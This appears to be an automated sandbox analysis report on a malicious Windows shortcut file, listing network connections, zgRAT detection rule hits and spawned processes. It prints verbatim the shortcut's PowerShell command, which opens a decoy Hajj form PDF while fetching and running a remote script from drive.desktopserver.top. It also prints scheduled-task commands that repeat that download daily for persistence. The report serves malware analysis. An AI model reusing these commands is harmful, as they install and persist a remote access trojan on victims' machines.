                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.5:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.5:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.92.189:443 -> 192.168.2.5:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.5:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:49770 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 24.2.powershell.exe.1f318711390.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 24.2.powershell.exe.1f318711390.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 23.2.powershell.exe.1ccbebb1660.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 23.2.powershell.exe.1ccbebb1660.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 22.2.powershell.exe.233543815c0.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 11.2.powershell.exe.19fed130000.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8288, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 9064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 9196, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8544, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows shortcut file (LNK) contains suspicious command line arguments
                  Source: Sv6eQZzG0Z.lnkLNK file: -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A56DF011_2_00007FF848A56DF0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5C93B11_2_00007FF848A5C93B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5CA9011_2_00007FF848A5CA90
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5CA3511_2_00007FF848A5CA35
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848B22DBA11_2_00007FF848B22DBA
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 24.2.powershell.exe.1f318711390.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 24.2.powershell.exe.1f318711390.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 23.2.powershell.exe.1ccbebb1660.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 23.2.powershell.exe.1ccbebb1660.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 22.2.powershell.exe.233543815c0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 11.2.powershell.exe.19fed130000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: Process Memory Space: powershell.exe PID: 8288, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 9064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 9196, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8544, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.evad.winLNK@61/43@9/9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zantpa52.wxd.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2056,i,4768736094800516795,6522799854547835148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdfJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2056,i,4768736094800516795,6522799854547835148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /fJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /fJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /fJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
